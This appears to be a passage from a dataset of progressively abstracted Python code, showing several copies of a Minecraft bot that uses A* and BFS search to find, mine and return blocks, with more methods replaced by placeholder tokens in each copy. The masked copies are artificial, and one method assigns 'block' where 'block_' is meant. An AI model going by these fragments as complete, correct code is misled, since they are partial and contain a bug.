imag_bot.take_actions(return_actions)\n return_actions.append({'func': '_place', 'args': (imag_bot.get_pos(\n ) + player_loc) / 2, 'kwargs': {'block': block_id}})\n self.take_actions(return_actions, _DELAY)\n\n def _get_block_loc(self, block_id):\n \"\"\"Return the location of the block.\"\"\"\n find_prob = FindProblem(self._pos, block_id)\n dirs = bfs(find_prob)\n return self._pos + sum(dirs)\n\n def _set_block(self, pos, block_):\n \"\"\"Place an actual block in the world.\n\n block is a block id.\"\"\"\n _get_mc().setBlock(pos, block_)\n\n def _get_block(self, pos):\n \"\"\"Get the block at the position.\"\"\"\n return _get_mc().getBlock(pos)\n\n def _move(self, pos):\n \"\"\"Move there, and set the appropriate blocks.\"\"\"\n self._set_block(self._pos, _AIR)\n self._set_block(self._pos + _Vec3(0, 1, 0), _AIR)\n self._set_block(pos, self._BOT_BLOCK)\n self._set_block(pos + _Vec3(0, 1, 0), self._BOT_BLOCK)\n self._pos = pos\n\n\nclass FindProblem(SearchProblem):\n \"\"\"Problem for finding the location of a block in the world.\n\n A state in this problem is a location.\n \"\"\"\n\n def __init__(self, start_loc, block_id):\n \"\"\"Initialize.\"\"\"\n self._start_loc = deepcopy(start_loc)\n self._block_id = block_id\n\n def getStartState(self):\n \"\"\"Return the starting location.\"\"\"\n return self._start_loc\n\n def isGoalState(self, state):\n return _get_mc().getBlock(state) == self._block_id\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for dir_ in _all_dirs():\n successor = state + dir_\n if successor.y <= _get_mc().getHeight(successor.x, successor.z\n ) and _get_mc().getBlock(successor) != _BEDROCK:\n rtn.append((successor, dir_, 1))\n return rtn\n\n\nclass _MineProblem(SearchProblem):\n \"\"\"The problem of finding the block and mining it (not returning\n it).\"\"\"\n\n def __init__(self, imag_bot, block_loc, block_id):\n \"\"\"Initialize the problem with an _ImaginaryBot.\n\n block_loc is a Vec3.\n \"\"\"\n self._bot = imag_bot\n self._block_loc = deepcopy(block_loc)\n self._block_id = block_id\n\n def get_block_loc(self):\n \"\"\"Return the block location.\"\"\"\n return deepcopy(self._block_loc)\n\n def get_block_id(self):\n \"\"\"Return the block it's trying to mine.\"\"\"\n return self._block_id\n\n def getStartState(self):\n \"\"\"Return the bot passed in.\"\"\"\n return self._bot\n\n def isGoalState(self, state):\n \"\"\"Return whether or not the bot has the block.\"\"\"\n return state.contains(self._block_id)\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for action in state.get_legal_actions():\n successor = deepcopy(state)\n successor.take_action(action)\n rtn.append((successor, action, 1))\n return rtn\n\n\nclass _ReturnProblem(SearchProblem):\n \"\"\"The problem of returning to the player. This does not place the block\n next to the player.\"\"\"\n\n def __init__(self, imag_bot, block_, player_loc):\n \"\"\"Initialized the problem with an _ImaginaryBot.\n\n block is a block id.\"\"\"\n self._bot = imag_bot\n self._block = block_\n self._player_loc = player_loc\n\n def get_player_loc(self):\n \"\"\"Return the player location.\"\"\"\n return deepcopy(self._player_loc)\n\n def getStartState(self):\n \"\"\"Return the bot passed in.\"\"\"\n return self._bot\n\n def isGoalState(self, state):\n \"\"\"Return whether or not the bot is next to the player.\"\"\"\n diff = state.get_pos() - self._player_loc\n return diff.y == 0 and (diff.x == 0 or diff.z == 0) and abs(diff.x\n ) + abs(diff.z) == 2 and state.get_block(self._player_loc + \n diff / 2 + _Vec3(0, -1, 0)) not in (_AIR, _LAVA, _WATER)\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for action in state.get_legal_actions(self._block):\n successor = deepcopy(state)\n successor.take_action(action)\n rtn.append((successor, action, 1))\n return rtn\n\n\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n", "<docstring token>\n<import token>\n<assignment token>\n<class token>\n\n\nclass _GenericBot:\n <docstring token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n\n def _get_move_actions(self, exclude=None):\n \"\"\"Return a list of legal movement actions.\n\n exclude is the block to exclude.\n \"\"\"\n rtn = []\n can_move_up = self._get_block(self._pos + _Vec3(0, 2, 0)) in {_AIR,\n _WATER}\n if can_move_up:\n if self._surrounded():\n rtn.append({'func': '_move', 'args': (self._pos + _Vec3(0, \n 1, 0),)})\n else:\n rtn.append({'func': '_move_up', 'args': (exclude,)})\n hidden_block = self._get_block(self._pos + _Vec3(0, -2, 0))\n if hidden_block == _WATER or hidden_block not in {_AIR, _LAVA}:\n rtn.append({'func': '_move_down'})\n for dir_ in _adj_dirs():\n rtn.extend(self._side_moves(dir_, can_move_up))\n return rtn\n <function token>\n <function token>\n <function token>\n <function token>\n\n def _can_place(self, loc):\n \"\"\"Return whether or not the bot can place a block at that location\n independent of what it has in its inventory.\"\"\"\n non_blocks = [_AIR, _WATER, _LAVA]\n player = [self._pos, self._pos + _Vec3(0, 1, 0)]\n for dir_ in (_adj_dirs + [_Vec3(0, 1, 0), _Vec3(0, -1, 0)]):\n new_loc = loc + dir_\n if new_loc not in player and self._get_block(new_loc\n ) not in non_blocks:\n return True\n return False\n <function token>\n <function token>\n <function token>\n\n\nclass _ImaginaryBot(_GenericBot):\n \"\"\"A bot used for finding paths that doesn't actually change blocks\n in the world.\"\"\"\n\n def __init__(self, pos, inventory=None):\n \"\"\"Create a new bot.\"\"\"\n _GenericBot.__init__(self, pos, inventory)\n self._changes = {}\n\n def _set_block(self, pos, block_):\n \"\"\"Set a block. block_ is the block id.\"\"\"\n self._changes[deepcopy(pos)] = block\n\n def _get_block(self, pos):\n \"\"\"Get the block at the position.\"\"\"\n if pos in self._changes:\n return self._changes[pos]\n else:\n return _get_mc().getBlock(pos)\n\n def get_block(self, pos):\n \"\"\"The public version.\"\"\"\n return self._get_block(pos)\n\n def __hash__(self):\n \"\"\"Return the hash.\"\"\"\n return hash(frozenset([self._pos] + _key_vals(self._inventory) +\n _key_vals(self._changes)))\n\n\nclass Bot(_GenericBot):\n \"\"\"The real bot.\n\n All vector arguments are Vec3s.\"\"\"\n _BOT_BLOCK = block.IRON_BLOCK.id\n\n def __init__(self):\n \"\"\"Create a bot next to the player.\"\"\"\n pos = _get_mc().player.getTilePos() + Vec3(2, 0, 0)\n pos = _Vec3(pos.x, pos.y, pos.z)\n _GenericBot.__init__(self, pos)\n self._pos = pos\n self._move(self._pos)\n\n @staticmethod\n def destroy_all():\n \"\"\"Destroy all bots within a small distance (in case I forget to\n destroy one).\"\"\"\n player_loc = _player_loc()\n minec = _get_mc()\n rad = 10\n for x in xrange(player_loc.x - rad, player_loc.x + rad):\n for y in xrange(player_loc.y - rad, player_loc.y + rad):\n for z in xrange(player_loc.z - rad, player_loc.z + rad):\n if minec.getBlock(x, y, z) == Bot._BOT_BLOCK:\n minec.setBlock(x, y, z, _AIR)\n\n def destroy(self):\n \"\"\"Set itself to air.\"\"\"\n self._set_block(self._pos, _AIR)\n self._set_block(self._pos + _Vec3(0, 1, 0), _AIR)\n\n def fetch(self, block_name):\n \"\"\"Mine and return a block to the player.\"\"\"\n imag_bot = _ImaginaryBot(self._pos, self._inventory)\n block_id = getattr(block, block_name).id\n block_loc = self._get_block_loc(block_id)\n mine_prob = _MineProblem(imag_bot, block_loc, block_id)\n mine_actions = astar(mine_prob, _mine_heuristic)\n self.take_actions(mine_actions, _DELAY)\n imag_bot = _ImaginaryBot(self._pos, self._inventory)\n player_loc = _player_loc()\n return_prob = _ReturnProblem(imag_bot, block_id, player_loc)\n return_actions = astar(return_prob, _return_heuristic)\n imag_bot.take_actions(return_actions)\n return_actions.append({'func': '_place', 'args': (imag_bot.get_pos(\n ) + player_loc) / 2, 'kwargs': {'block': block_id}})\n self.take_actions(return_actions, _DELAY)\n\n def _get_block_loc(self, block_id):\n \"\"\"Return the location of the block.\"\"\"\n find_prob = FindProblem(self._pos, block_id)\n dirs = bfs(find_prob)\n return self._pos + sum(dirs)\n\n def _set_block(self, pos, block_):\n \"\"\"Place an actual block in the world.\n\n block is a block id.\"\"\"\n _get_mc().setBlock(pos, block_)\n\n def _get_block(self, pos):\n \"\"\"Get the block at the position.\"\"\"\n return _get_mc().getBlock(pos)\n\n def _move(self, pos):\n \"\"\"Move there, and set the appropriate blocks.\"\"\"\n self._set_block(self._pos, _AIR)\n self._set_block(self._pos + _Vec3(0, 1, 0), _AIR)\n self._set_block(pos, self._BOT_BLOCK)\n self._set_block(pos + _Vec3(0, 1, 0), self._BOT_BLOCK)\n self._pos = pos\n\n\nclass FindProblem(SearchProblem):\n \"\"\"Problem for finding the location of a block in the world.\n\n A state in this problem is a location.\n \"\"\"\n\n def __init__(self, start_loc, block_id):\n \"\"\"Initialize.\"\"\"\n self._start_loc = deepcopy(start_loc)\n self._block_id = block_id\n\n def getStartState(self):\n \"\"\"Return the starting location.\"\"\"\n return self._start_loc\n\n def isGoalState(self, state):\n return _get_mc().getBlock(state) == self._block_id\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for dir_ in _all_dirs():\n successor = state + dir_\n if successor.y <= _get_mc().getHeight(successor.x, successor.z\n ) and _get_mc().getBlock(successor) != _BEDROCK:\n rtn.append((successor, dir_, 1))\n return rtn\n\n\nclass _MineProblem(SearchProblem):\n \"\"\"The problem of finding the block and mining it (not returning\n it).\"\"\"\n\n def __init__(self, imag_bot, block_loc, block_id):\n \"\"\"Initialize the problem with an _ImaginaryBot.\n\n block_loc is a Vec3.\n \"\"\"\n self._bot = imag_bot\n self._block_loc = deepcopy(block_loc)\n self._block_id = block_id\n\n def get_block_loc(self):\n \"\"\"Return the block location.\"\"\"\n return deepcopy(self._block_loc)\n\n def get_block_id(self):\n \"\"\"Return the block it's trying to mine.\"\"\"\n return self._block_id\n\n def getStartState(self):\n \"\"\"Return the bot passed in.\"\"\"\n return self._bot\n\n def isGoalState(self, state):\n \"\"\"Return whether or not the bot has the block.\"\"\"\n return state.contains(self._block_id)\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for action in state.get_legal_actions():\n successor = deepcopy(state)\n successor.take_action(action)\n rtn.append((successor, action, 1))\n return rtn\n\n\nclass _ReturnProblem(SearchProblem):\n \"\"\"The problem of returning to the player. This does not place the block\n next to the player.\"\"\"\n\n def __init__(self, imag_bot, block_, player_loc):\n \"\"\"Initialized the problem with an _ImaginaryBot.\n\n block is a block id.\"\"\"\n self._bot = imag_bot\n self._block = block_\n self._player_loc = player_loc\n\n def get_player_loc(self):\n \"\"\"Return the player location.\"\"\"\n return deepcopy(self._player_loc)\n\n def getStartState(self):\n \"\"\"Return the bot passed in.\"\"\"\n return self._bot\n\n def isGoalState(self, state):\n \"\"\"Return whether or not the bot is next to the player.\"\"\"\n diff = state.get_pos() - self._player_loc\n return diff.y == 0 and (diff.x == 0 or diff.z == 0) and abs(diff.x\n ) + abs(diff.z) == 2 and state.get_block(self._player_loc + \n diff / 2 + _Vec3(0, -1, 0)) not in (_AIR, _LAVA, _WATER)\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for action in state.get_legal_actions(self._block):\n successor = deepcopy(state)\n successor.take_action(action)\n rtn.append((successor, action, 1))\n return rtn\n\n\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n", "<docstring token>\n<import token>\n<assignment token>\n<class token>\n\n\nclass _GenericBot:\n <docstring token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n\n def _get_move_actions(self, exclude=None):\n \"\"\"Return a list of legal movement actions.\n\n exclude is the block to exclude.\n \"\"\"\n rtn = []\n can_move_up = self._get_block(self._pos + _Vec3(0, 2, 0)) in {_AIR,\n _WATER}\n if can_move_up:\n if self._surrounded():\n rtn.append({'func': '_move', 'args': (self._pos + _Vec3(0, \n 1, 0),)})\n else:\n rtn.append({'func': '_move_up', 'args': (exclude,)})\n hidden_block = self._get_block(self._pos + _Vec3(0, -2, 0))\n if hidden_block == _WATER or hidden_block not in {_AIR, _LAVA}:\n rtn.append({'func': '_move_down'})\n for dir_ in _adj_dirs():\n rtn.extend(self._side_moves(dir_, can_move_up))\n return rtn\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n\n\nclass _ImaginaryBot(_GenericBot):\n \"\"\"A bot used for finding paths that doesn't actually change blocks\n in the world.\"\"\"\n\n def __init__(self, pos, inventory=None):\n \"\"\"Create a new bot.\"\"\"\n _GenericBot.__init__(self, pos, inventory)\n self._changes = {}\n\n def _set_block(self, pos, block_):\n \"\"\"Set a block. block_ is the block id.\"\"\"\n self._changes[deepcopy(pos)] = block\n\n def _get_block(self, pos):\n \"\"\"Get the block at the position.\"\"\"\n if pos in self._changes:\n return self._changes[pos]\n else:\n return _get_mc().getBlock(pos)\n\n def get_block(self, pos):\n \"\"\"The public version.\"\"\"\n return self._get_block(pos)\n\n def __hash__(self):\n \"\"\"Return the hash.\"\"\"\n return hash(frozenset([self._pos] + _key_vals(self._inventory) +\n _key_vals(self._changes)))\n\n\nclass Bot(_GenericBot):\n \"\"\"The real bot.\n\n All vector arguments are Vec3s.\"\"\"\n _BOT_BLOCK = block.IRON_BLOCK.id\n\n def __init__(self):\n \"\"\"Create a bot next to the player.\"\"\"\n pos = _get_mc().player.getTilePos() + Vec3(2, 0, 0)\n pos = _Vec3(pos.x, pos.y, pos.z)\n _GenericBot.__init__(self, pos)\n self._pos = pos\n self._move(self._pos)\n\n @staticmethod\n def destroy_all():\n \"\"\"Destroy all bots within a small distance (in case I forget to\n destroy one).\"\"\"\n player_loc = _player_loc()\n minec = _get_mc()\n rad = 10\n for x in xrange(player_loc.x - rad, player_loc.x + rad):\n for y in xrange(player_loc.y - rad, player_loc.y + rad):\n for z in xrange(player_loc.z - rad, player_loc.z + rad):\n if minec.getBlock(x, y, z) == Bot._BOT_BLOCK:\n minec.setBlock(x, y, z, _AIR)\n\n def destroy(self):\n \"\"\"Set itself to air.\"\"\"\n self._set_block(self._pos, _AIR)\n self._set_block(self._pos + _Vec3(0, 1, 0), _AIR)\n\n def fetch(self, block_name):\n \"\"\"Mine and return a block to the player.\"\"\"\n imag_bot = _ImaginaryBot(self._pos, self._inventory)\n block_id = getattr(block, block_name).id\n block_loc = self._get_block_loc(block_id)\n mine_prob = _MineProblem(imag_bot, block_loc, block_id)\n mine_actions = astar(mine_prob, _mine_heuristic)\n self.take_actions(mine_actions, _DELAY)\n imag_bot = _ImaginaryBot(self._pos, self._inventory)\n player_loc = _player_loc()\n return_prob = _ReturnProblem(imag_bot, block_id, player_loc)\n return_actions = astar(return_prob, _return_heuristic)\n imag_bot.take_actions(return_actions)\n return_actions.append({'func': '_place', 'args': (imag_bot.get_pos(\n ) + player_loc) / 2, 'kwargs': {'block': block_id}})\n self.take_actions(return_actions, _DELAY)\n\n def _get_block_loc(self, block_id):\n \"\"\"Return the location of the block.\"\"\"\n find_prob = FindProblem(self._pos, block_id)\n dirs = bfs(find_prob)\n return self._pos + sum(dirs)\n\n def _set_block(self, pos, block_):\n \"\"\"Place an actual block in the world.\n\n block is a block id.\"\"\"\n _get_mc().setBlock(pos, block_)\n\n def _get_block(self, pos):\n \"\"\"Get the block at the position.\"\"\"\n return _get_mc().getBlock(pos)\n\n def _move(self, pos):\n \"\"\"Move there, and set the appropriate blocks.\"\"\"\n self._set_block(self._pos, _AIR)\n self._set_block(self._pos + _Vec3(0, 1, 0), _AIR)\n self._set_block(pos, self._BOT_BLOCK)\n self._set_block(pos + _Vec3(0, 1, 0), self._BOT_BLOCK)\n self._pos = pos\n\n\nclass FindProblem(SearchProblem):\n \"\"\"Problem for finding the location of a block in the world.\n\n A state in this problem is a location.\n \"\"\"\n\n def __init__(self, start_loc, block_id):\n \"\"\"Initialize.\"\"\"\n self._start_loc = deepcopy(start_loc)\n self._block_id = block_id\n\n def getStartState(self):\n \"\"\"Return the starting location.\"\"\"\n return self._start_loc\n\n def isGoalState(self, state):\n return _get_mc().getBlock(state) == self._block_id\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for dir_ in _all_dirs():\n successor = state + dir_\n if successor.y <= _get_mc().getHeight(successor.x, successor.z\n ) and _get_mc().getBlock(successor) != _BEDROCK:\n rtn.append((successor, dir_, 1))\n return rtn\n\n\nclass _MineProblem(SearchProblem):\n \"\"\"The problem of finding the block and mining it (not returning\n it).\"\"\"\n\n def __init__(self, imag_bot, block_loc, block_id):\n \"\"\"Initialize the problem with an _ImaginaryBot.\n\n block_loc is a Vec3.\n \"\"\"\n self._bot = imag_bot\n self._block_loc = deepcopy(block_loc)\n self._block_id = block_id\n\n def get_block_loc(self):\n \"\"\"Return the block location.\"\"\"\n return deepcopy(self._block_loc)\n\n def get_block_id(self):\n \"\"\"Return the block it's trying to mine.\"\"\"\n return self._block_id\n\n def getStartState(self):\n \"\"\"Return the bot passed in.\"\"\"\n return self._bot\n\n def isGoalState(self, state):\n \"\"\"Return whether or not the bot has the block.\"\"\"\n return state.contains(self._block_id)\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for action in state.get_legal_actions():\n successor = deepcopy(state)\n successor.take_action(action)\n rtn.append((successor, action, 1))\n return rtn\n\n\nclass _ReturnProblem(SearchProblem):\n \"\"\"The problem of returning to the player. This does not place the block\n next to the player.\"\"\"\n\n def __init__(self, imag_bot, block_, player_loc):\n \"\"\"Initialized the problem with an _ImaginaryBot.\n\n block is a block id.\"\"\"\n self._bot = imag_bot\n self._block = block_\n self._player_loc = player_loc\n\n def get_player_loc(self):\n \"\"\"Return the player location.\"\"\"\n return deepcopy(self._player_loc)\n\n def getStartState(self):\n \"\"\"Return the bot passed in.\"\"\"\n return self._bot\n\n def isGoalState(self, state):\n \"\"\"Return whether or not the bot is next to the player.\"\"\"\n diff = state.get_pos() - self._player_loc\n return diff.y == 0 and (diff.x == 0 or diff.z == 0) and abs(diff.x\n ) + abs(diff.z) == 2 and state.get_block(self._player_loc + \n diff / 2 + _Vec3(0, -1, 0)) not in (_AIR, _LAVA, _WATER)\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for action in state.get_legal_actions(self._block):\n successor = deepcopy(state)\n successor.take_action(action)\n rtn.append((successor, action, 1))\n return rtn\n\n\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n", "<docstring token>\n<import token>\n<assignment token>\n<class token>\n\n\nclass _GenericBot:\n <docstring token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n\n\nclass _ImaginaryBot(_GenericBot):\n \"\"\"A bot used for finding paths that doesn't actually change blocks\n in the world.\"\"\"\n\n def __init__(self, pos, inventory=None):\n \"\"\"Create a new bot.\"\"\"\n _GenericBot.__init__(self, pos, inventory)\n self._changes = {}\n\n def _set_block(self, pos, block_):\n \"\"\"Set a block. block_ is the block id.\"\"\"\n self._changes[deepcopy(pos)] = block\n\n def _get_block(self, pos):\n \"\"\"Get the block at the position.\"\"\"\n if pos in self._changes:\n return self._changes[pos]\n else:\n return _get_mc().getBlock(pos)\n\n def get_block(self, pos):\n \"\"\"The public version.\"\"\"\n return self._get_block(pos)\n\n def __hash__(self):\n \"\"\"Return the hash.\"\"\"\n return hash(frozenset([self._pos] + _key_vals(self._inventory) +\n _key_vals(self._changes)))\n\n\nclass Bot(_GenericBot):\n \"\"\"The real bot.\n\n All vector arguments are Vec3s.\"\"\"\n _BOT_BLOCK = block.IRON_BLOCK.id\n\n def __init__(self):\n \"\"\"Create a bot next to the player.\"\"\"\n pos = _get_mc().player.getTilePos() + Vec3(2, 0, 0)\n pos = _Vec3(pos.x, pos.y, pos.z)\n _GenericBot.__init__(self, pos)\n self._pos = pos\n self._move(self._pos)\n\n @staticmethod\n def destroy_all():\n \"\"\"Destroy all bots within a small distance (in case I forget to\n destroy one).\"\"\"\n player_loc = _player_loc()\n minec = _get_mc()\n rad = 10\n for x in xrange(player_loc.x - rad, player_loc.x + rad):\n for y in xrange(player_loc.y - rad, player_loc.y + rad):\n for z in xrange(player_loc.z - rad, player_loc.z + rad):\n if minec.getBlock(x, y, z) == Bot._BOT_BLOCK:\n minec.setBlock(x, y, z, _AIR)\n\n def destroy(self):\n \"\"\"Set itself to air.\"\"\"\n self._set_block(self._pos, _AIR)\n self._set_block(self._pos + _Vec3(0, 1, 0), _AIR)\n\n def fetch(self, block_name):\n \"\"\"Mine and return a block to the player.\"\"\"\n imag_bot = _ImaginaryBot(self._pos, self._inventory)\n block_id = getattr(block, block_name).id\n block_loc = self._get_block_loc(block_id)\n mine_prob = _MineProblem(imag_bot, block_loc, block_id)\n mine_actions = astar(mine_prob, _mine_heuristic)\n self.take_actions(mine_actions, _DELAY)\n imag_bot = _ImaginaryBot(self._pos, self._inventory)\n player_loc = _player_loc()\n return_prob = _ReturnProblem(imag_bot, block_id, player_loc)\n return_actions = astar(return_prob, _return_heuristic)\n imag_bot.take_actions(return_actions)\n return_actions.append({'func': '_place', 'args': (imag_bot.get_pos(\n ) + player_loc) / 2, 'kwargs': {'block': block_id}})\n self.take_actions(return_actions, _DELAY)\n\n def _get_block_loc(self, block_id):\n \"\"\"Return the location of the block.\"\"\"\n find_prob = FindProblem(self._pos, block_id)\n dirs = bfs(find_prob)\n return self._pos + sum(dirs)\n\n def _set_block(self, pos, block_):\n \"\"\"Place an actual block in the world.\n\n block is a block id.\"\"\"\n _get_mc().setBlock(pos, block_)\n\n def _get_block(self, pos):\n \"\"\"Get the block at the position.\"\"\"\n return _get_mc().getBlock(pos)\n\n def _move(self, pos):\n \"\"\"Move there, and set the appropriate blocks.\"\"\"\n self._set_block(self._pos, _AIR)\n self._set_block(self._pos + _Vec3(0, 1, 0), _AIR)\n self._set_block(pos, self._BOT_BLOCK)\n self._set_block(pos + _Vec3(0, 1, 0), self._BOT_BLOCK)\n self._pos = pos\n\n\nclass FindProblem(SearchProblem):\n \"\"\"Problem for finding the location of a block in the world.\n\n A state in this problem is a location.\n \"\"\"\n\n def __init__(self, start_loc, block_id):\n \"\"\"Initialize.\"\"\"\n self._start_loc = deepcopy(start_loc)\n self._block_id = block_id\n\n def getStartState(self):\n \"\"\"Return the starting location.\"\"\"\n return self._start_loc\n\n def isGoalState(self, state):\n return _get_mc().getBlock(state) == self._block_id\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for dir_ in _all_dirs():\n successor = state + dir_\n if successor.y <= _get_mc().getHeight(successor.x, successor.z\n ) and _get_mc().getBlock(successor) != _BEDROCK:\n rtn.append((successor, dir_, 1))\n return rtn\n\n\nclass _MineProblem(SearchProblem):\n \"\"\"The problem of finding the block and mining it (not returning\n it).\"\"\"\n\n def __init__(self, imag_bot, block_loc, block_id):\n \"\"\"Initialize the problem with an _ImaginaryBot.\n\n block_loc is a Vec3.\n \"\"\"\n self._bot = imag_bot\n self._block_loc = deepcopy(block_loc)\n self._block_id = block_id\n\n def get_block_loc(self):\n \"\"\"Return the block location.\"\"\"\n return deepcopy(self._block_loc)\n\n def get_block_id(self):\n \"\"\"Return the block it's trying to mine.\"\"\"\n return self._block_id\n\n def getStartState(self):\n \"\"\"Return the bot passed in.\"\"\"\n return self._bot\n\n def isGoalState(self, state):\n \"\"\"Return whether or not the bot has the block.\"\"\"\n return state.contains(self._block_id)\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for action in state.get_legal_actions():\n successor = deepcopy(state)\n successor.take_action(action)\n rtn.append((successor, action, 1))\n return rtn\n\n\nclass _ReturnProblem(SearchProblem):\n \"\"\"The problem of returning to the player. This does not place the block\n next to the player.\"\"\"\n\n def __init__(self, imag_bot, block_, player_loc):\n \"\"\"Initialized the problem with an _ImaginaryBot.\n\n block is a block id.\"\"\"\n self._bot = imag_bot\n self._block = block_\n self._player_loc = player_loc\n\n def get_player_loc(self):\n \"\"\"Return the player location.\"\"\"\n return deepcopy(self._player_loc)\n\n def getStartState(self):\n \"\"\"Return the bot passed in.\"\"\"\n return self._bot\n\n def isGoalState(self, state):\n \"\"\"Return whether or not the bot is next to the player.\"\"\"\n diff = state.get_pos() - self._player_loc\n return diff.y == 0 and (diff.x == 0 or diff.z == 0) and abs(diff.x\n ) + abs(diff.z) == 2 and state.get_block(self._player_loc + \n diff / 2 + _Vec3(0, -1, 0)) not in (_AIR, _LAVA, _WATER)\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for action in state.get_legal_actions(self._block):\n successor = deepcopy(state)\n successor.take_action(action)\n rtn.append((successor, action, 1))\n return rtn\n\n\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n", "<docstring token>\n<import token>\n<assignment token>\n<class token>\n<class token>\n\n\nclass _ImaginaryBot(_GenericBot):\n \"\"\"A bot used for finding paths that doesn't actually change blocks\n in the world.\"\"\"\n\n def __init__(self, pos, inventory=None):\n \"\"\"Create a new bot.\"\"\"\n _GenericBot.__init__(self, pos, inventory)\n self._changes = {}\n\n def _set_block(self, pos, block_):\n \"\"\"Set a block. block_ is the block id.\"\"\"\n self._changes[deepcopy(pos)] = block\n\n def _get_block(self, pos):\n \"\"\"Get the block at the position.\"\"\"\n if pos in self._changes:\n return self._changes[pos]\n else:\n return _get_mc().getBlock(pos)\n\n def get_block(self, pos):\n \"\"\"The public version.\"\"\"\n return self._get_block(pos)\n\n def __hash__(self):\n \"\"\"Return the hash.\"\"\"\n return hash(frozenset([self._pos] + _key_vals(self._inventory) +\n _key_vals(self._changes)))\n\n\nclass Bot(_GenericBot):\n \"\"\"The real bot.\n\n All vector arguments are Vec3s.\"\"\"\n _BOT_BLOCK = block.IRON_BLOCK.id\n\n def __init__(self):\n \"\"\"Create a bot next to the player.\"\"\"\n pos = _get_mc().player.getTilePos() + Vec3(2, 0, 0)\n pos = _Vec3(pos.x, pos.y, pos.z)\n _GenericBot.__init__(self, pos)\n self._pos = pos\n self._move(self._pos)\n\n @staticmethod\n def destroy_all():\n \"\"\"Destroy all bots within a small distance (in case I forget to\n destroy one).\"\"\"\n player_loc = _player_loc()\n minec = _get_mc()\n rad = 10\n for x in xrange(player_loc.x - rad, player_loc.x + rad):\n for y in xrange(player_loc.y - rad, player_loc.y + rad):\n for z in xrange(player_loc.z - rad, player_loc.z + rad):\n if minec.getBlock(x, y, z) == Bot._BOT_BLOCK:\n minec.setBlock(x, y, z, _AIR)\n\n def destroy(self):\n \"\"\"Set itself to air.\"\"\"\n self._set_block(self._pos, _AIR)\n self._set_block(self._pos + _Vec3(0, 1, 0), _AIR)\n\n def fetch(self, block_name):\n \"\"\"Mine and return a block to the player.\"\"\"\n imag_bot = _ImaginaryBot(self._pos, self._inventory)\n block_id = getattr(block, block_name).id\n block_loc = self._get_block_loc(block_id)\n mine_prob = _MineProblem(imag_bot, block_loc, block_id)\n mine_actions = astar(mine_prob, _mine_heuristic)\n self.take_actions(mine_actions, _DELAY)\n imag_bot = _ImaginaryBot(self._pos, self._inventory)\n player_loc = _player_loc()\n return_prob = _ReturnProblem(imag_bot, block_id, player_loc)\n return_actions = astar(return_prob, _return_heuristic)\n imag_bot.take_actions(return_actions)\n return_actions.append({'func': '_place', 'args': (imag_bot.get_pos(\n ) + player_loc) / 2, 'kwargs': {'block': block_id}})\n self.take_actions(return_actions, _DELAY)\n\n def _get_block_loc(self, block_id):\n \"\"\"Return the location of the block.\"\"\"\n find_prob = FindProblem(self._pos, block_id)\n dirs = bfs(find_prob)\n return self._pos + sum(dirs)\n\n def _set_block(self, pos, block_):\n \"\"\"Place an actual block in the world.\n\n block is a block id.\"\"\"\n _get_mc().setBlock(pos, block_)\n\n def _get_block(self, pos):\n \"\"\"Get the block at the position.\"\"\"\n return _get_mc().getBlock(pos)\n\n def _move(self, pos):\n \"\"\"Move there, and set the appropriate blocks.\"\"\"\n self._set_block(self._pos, _AIR)\n self._set_block(self._pos + _Vec3(0, 1, 0), _AIR)\n self._set_block(pos, self._BOT_BLOCK)\n self._set_block(pos + _Vec3(0, 1, 0), self._BOT_BLOCK)\n self._pos = pos\n\n\nclass FindProblem(SearchProblem):\n \"\"\"Problem for finding the location of a block in the world.\n\n A state in this problem is a location.\n \"\"\"\n\n def __init__(self, start_loc, block_id):\n \"\"\"Initialize.\"\"\"\n self._start_loc = deepcopy(start_loc)\n self._block_id = block_id\n\n def getStartState(self):\n \"\"\"Return the starting location.\"\"\"\n return self._start_loc\n\n def isGoalState(self, state):\n return _get_mc().getBlock(state) == self._block_id\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for dir_ in _all_dirs():\n successor = state + dir_\n if successor.y <= _get_mc().getHeight(successor.x, successor.z\n ) and _get_mc().getBlock(successor) != _BEDROCK:\n rtn.append((successor, dir_, 1))\n return rtn\n\n\nclass _MineProblem(SearchProblem):\n \"\"\"The problem of finding the block and mining it (not returning\n it).\"\"\"\n\n def __init__(self, imag_bot, block_loc, block_id):\n \"\"\"Initialize the problem with an _ImaginaryBot.\n\n block_loc is a Vec3.\n \"\"\"\n self._bot = imag_bot\n self._block_loc = deepcopy(block_loc)\n self._block_id = block_id\n\n def get_block_loc(self):\n \"\"\"Return the block 